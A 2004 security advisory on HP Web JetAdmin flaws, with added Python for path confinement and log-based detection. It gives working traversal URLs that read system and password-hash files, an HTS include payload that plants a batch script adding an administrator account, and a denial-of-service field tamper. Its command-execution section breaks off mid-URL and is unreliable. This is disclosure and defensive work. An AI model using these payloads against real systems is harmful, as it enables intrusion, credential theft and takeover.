[NEWS] Multiple HP Web JetAdmin Vulnerabilities (DoS, Upload, Write, Read, Command Execution)
From: SecuriTeam (support_at_securiteam.com)
Date: 03/31/04
To: list@securiteam.com Date: 31 Mar 2004 11:50:18 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple HP Web JetAdmin Vulnerabilities (DoS, Upload, Write, Read, Command Execution)
------------------------------------------------------------------------
SUMMARY
If an administrator has not set a password on the HP Web JetAdmin product,
anyone who can reach its HTTP server can perform all of the following:
denial of service, upload of any file to a known location on the
filesystem, writing to any file on the filesystem, and reading any file
from the filesystem.
HP ships a modified Apache web server with only a small number of modules
included. The service runs with SYSTEM privileges. The vulnerabilities
stem from the HTS scripting language on which the product is built: a
number of issues were found both in the scripting language itself and in
some of the script files shipped with the product.
DETAILS
Vulnerable Systems:
 * HP Web JetAdmin version 7.5.2546 and prior

1. Remote file upload (any file, with any extension)
Using the /plugins/hpjwja/script/devices_update_printer_fw_upload.hts HTS
script, any file may be uploaded to:
https://victim:8443/plugins/hpjwja/firmware/printer/
Fortunately this directory does not have execute permissions, but the
script, used together with the other vulnerable files described below,
lets an attacker use the directory (and the files placed in it) as an
'include' directory.

2. File reading vulnerability and HTS script injection
Submitting the following URL:
https://victim:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
returns a file that resides outside the HTML root directory, because no
check is made that the requesting user is allowed to access the file. An
'authenticated' user who is not the admin account on the Jet Admin service
could use the setinfo.hts script to read the local.users file and obtain
the password hashes of every user who has a password set for the Jet Admin
application. Using the following URL:
https://victim:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users
a malicious user could then run john the ripper or another password
cracker against the htpasswd-format file.

Using the setinfo.hts script together with an uploaded custom "hts"
include file, such as:
https://victim:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.inc
an attacker can cause the setinfo script to execute the included HTS
code. This includes writing to ANY file on the host running the Jet Admin
service. An example include file, test.inc, containing the WriteToFile
syntax:

Example:
[=test net user heh h0h0h0 /add
net localgroup Administrators heh /add
=]
[=__installdir C:\Documents and Settings\Administrator\Start Menu\Programs\Startup=]
[[httpd:WriteToFile([$__installdir$]/[#test.bat#],[$test$])]]

Since the service runs as SYSTEM, files can be written anywhere, for
example into the Administrator's Startup folder as above, where a batch
script adds another administrative user. If IIS is installed, the same
write primitive can be used to gain an interactive shell (through /scripts
or /msadc, or simply by writing ASP scripts).

3. Denial of Service
Another issue identified is a Denial of Service caused by a bad call to
stricmp. If the include file contains the following lines:
[=dir C:\test=]
[[httpd:RemoveCacheFiles($dir$)]]
hpwebjetd crashes with an invalid read. This is believed to be due to the
stricmp call not expecting a second $ at the end of the dir variable.

Oddly enough, this DoS can be triggered without an include file at all.
Using a tool to modify HTTP variables, the hpwebjetd.exe service can be
made to fail by replacing the obj=<validcall> hidden field that a form
normally submits with the [[httpd:RemoveCacheFiles($dir$)]] call. For
instance, /plugins/hpjfpmui/script/wja_update_product.hts:
<FORM onsubmit="return VerifyUpload(this)" action=wja_update_product.hts
method=post encType=multipart/form-data>
<INPUT type=hidden value=[[httpd:RemoveCacheFiles($dir$)]] name=obj>
(the value of obj has been changed to the DoS function)
<INPUT type=hidden value=true name=__save>
<INPUT type=hidden value=0 name=packageCount>
<INPUT type=hidden value=blah.fpm name=goodFilename>

4. Command Execution
The following HTTP request would result in a user account being created
once the server is restarted.
https://

Workarounds:
First and foremost, HP has included a number of different methods of
securing this web application. Anyone who uses this product should set
passwords for the service during setup. Secondly, HP provides a mechanism
to restrict access to certain IP addresses; this feature should also be
used, since the product rarely needs to be managed from any machine other
than the administrator's desktop. Once these are in place, the only
remaining issue is 'printer users' being configured and used by people
other than Administrators. HP also recommends deleting the "test"
directory. On a default install this folder is located at:
C:\Program Files\HP Web Jetadmin\doc\plugins\hpjdwm\script\<test>

ADDITIONAL INFORMATION
The information has been provided by <mailto:wirepair@roguemail.net>
wirepair and <mailto:sflist@digitaloffense.net> H D Moore.
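The file-reading issue in section 2 comes down to the setinclude parameter
being joined onto the script directory with nothing confining the result.
The following Python is an added example written for this page, not HP's
code (the HTS runtime is closed); the document root /webroot and the
include directory are assumptions modelled on the URLs quoted above. It
shows the unchecked resolution beside a confined one that percent-decodes,
folds Windows backslashes, canonicalises the path and rejects anything that
does not end up strictly inside the include directory, applied to the
advisory's own payloads:

```python
"""Confining an HTS-style setinclude parameter to its include directory."""
import posixpath
from urllib.parse import parse_qs, urlsplit

# Assumption: the vulnerable script lives under /plugins/hpjdwm/script/test/
# below a hypothetical document root /webroot, and includes may only be
# resolved from that one directory.
INCLUDE_ROOT = "/webroot/plugins/hpjdwm/script/test"


def vulnerable_resolve(requested: str) -> str:
    """The behaviour the advisory describes: the parameter is joined onto
    the script directory with no check, so '../' walks out of the web root."""
    return posixpath.normpath(posixpath.join(INCLUDE_ROOT, requested))


def safe_resolve(requested: str):
    """Return the confined absolute path, or None if the request is empty,
    absolute, a drive path, or does not land strictly inside INCLUDE_ROOT
    after normalisation."""
    if not requested or "\x00" in requested:
        return None
    # The product runs on Windows, where '\' is also a separator; fold it so
    # '..\\..\\boot.ini' cannot slip past a forward-slash-only check.
    candidate = requested.replace("\\", "/")
    if candidate.startswith("/") or ":" in candidate:
        return None
    resolved = posixpath.normpath(posixpath.join(INCLUDE_ROOT, candidate))
    # Compare against the root plus a trailing separator so that a sibling
    # directory such as .../test2 is not accepted as "inside" .../test, and
    # so that the root directory itself is not an acceptable include.
    if not resolved.startswith(INCLUDE_ROOT + "/"):
        return None
    return resolved


def resolve_from_url(url: str):
    """Apply safe_resolve to the setinclude query parameter of a request URL.
    parse_qs percent-decodes first, so %2e%2e%2f is checked as '../'."""
    values = parse_qs(urlsplit(url).query).get("setinclude", [])
    return safe_resolve(values[0]) if values else None


if __name__ == "__main__":
    # The three payloads quoted in the advisory plus one legitimate include.
    for p in ("../../../../../../../boot.ini",
              "../../../../../auth/local.users",
              "../../../hpjwja/firmware/printer/test.inc",
              "setinfo.inc"):
        print(f"{p!r:46} unchecked={vulnerable_resolve(p)}")
        print(f"{'':46} confined={safe_resolve(p)}")
```

Note that the unchecked form collapses the seven `../` of the boot.ini
payload to the filesystem root, which is exactly the read the advisory
shows; the confined form returns None for all three payloads and only
yields a path for an include that stays under the script's own directory.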
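On the operations side, every request in sections 1 and 2 is a plain GET or
POST that the Web JetAdmin web server logs. The following Python is an
added detection example, not part of the advisory or the product; the log
lines are constructed to match the URLs quoted above and the format is
assumed to be Apache's common log format on port 8443. It tags traversal
reads, reads of local.users, uploads to the firmware directory, and the
upload-then-include chain when both come from the same client:

```python
"""Access-log detection for the Web JetAdmin attack chain in this advisory."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines (Apache common log format), not real traffic.
# 10.0.0.5 reads files, 10.0.0.7 runs the upload-then-include chain,
# 10.0.0.9 is a benign client.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Mar/2004:11:50:18 +0200] "GET /plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini HTTP/1.1" 200 412
10.0.0.5 - - [31/Mar/2004:11:51:02 +0200] "GET /plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users HTTP/1.1" 200 318
10.0.0.7 - - [31/Mar/2004:11:52:40 +0200] "POST /plugins/hpjwja/script/devices_update_printer_fw_upload.hts HTTP/1.1" 200 1203
10.0.0.7 - - [31/Mar/2004:11:53:05 +0200] "GET /plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.inc HTTP/1.1" 200 77
10.0.0.9 - - [31/Mar/2004:11:54:00 +0200] "GET /plugins/hpjdwm/script/test/setinfo.hts?setinclude=setinfo.inc HTTP/1.1" 200 250
10.0.0.9 - - [31/Mar/2004:11:54:30 +0200] "GET /index.hts HTTP/1.1" 200 5000
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
INCLUDE_SCRIPT = "/setinfo.hts"
UPLOAD_SCRIPT = "/plugins/hpjwja/script/devices_update_printer_fw_upload.hts"
UPLOAD_DIR = "hpjwja/firmware/printer"


def classify(method: str, target: str) -> list:
    """Tags for one request; an empty list when nothing here applies."""
    tags = []
    parts = urlsplit(target)
    if method == "POST" and parts.path == UPLOAD_SCRIPT:
        tags.append("firmware-upload")
    if parts.path.endswith(INCLUDE_SCRIPT):
        # parse_qs percent-decodes, so %2e%2e%2f is inspected as '../'.
        for inc in parse_qs(parts.query).get("setinclude", []):
            folded = inc.replace("\\", "/")
            segments = folded.split("/")
            if ".." in segments:
                tags.append("traversal-read")
            if segments[-1] == "local.users":
                tags.append("credential-read")
            if UPLOAD_DIR in folded:
                tags.append("include-from-upload-dir")
    return tags


def analyze(log_text: str) -> dict:
    """Per-client tag sets. Adds 'upload-then-include-chain' when a client
    that already uploaded to the firmware directory later includes from it,
    which is the write-anything primitive from section 2."""
    findings = defaultdict(set)
    uploaded = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip = m["ip"]
        tags = classify(m["method"], m["target"])
        if "firmware-upload" in tags:
            uploaded.add(ip)
        if "include-from-upload-dir" in tags and ip in uploaded:
            tags.append("upload-then-include-chain")
        findings[ip].update(tags)
    return {ip: tags for ip, tags in findings.items() if tags}


if __name__ == "__main__":
    for ip, tags in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, sorted(tags))
```

The access log does not carry POST bodies, so the obj=[[httpd:RemoveCacheFiles($dir$)]]
field tampering from section 3 is not visible here; it would need request
body capture at a reverse proxy or a crash alert on hpwebjetd.exe instead.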
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.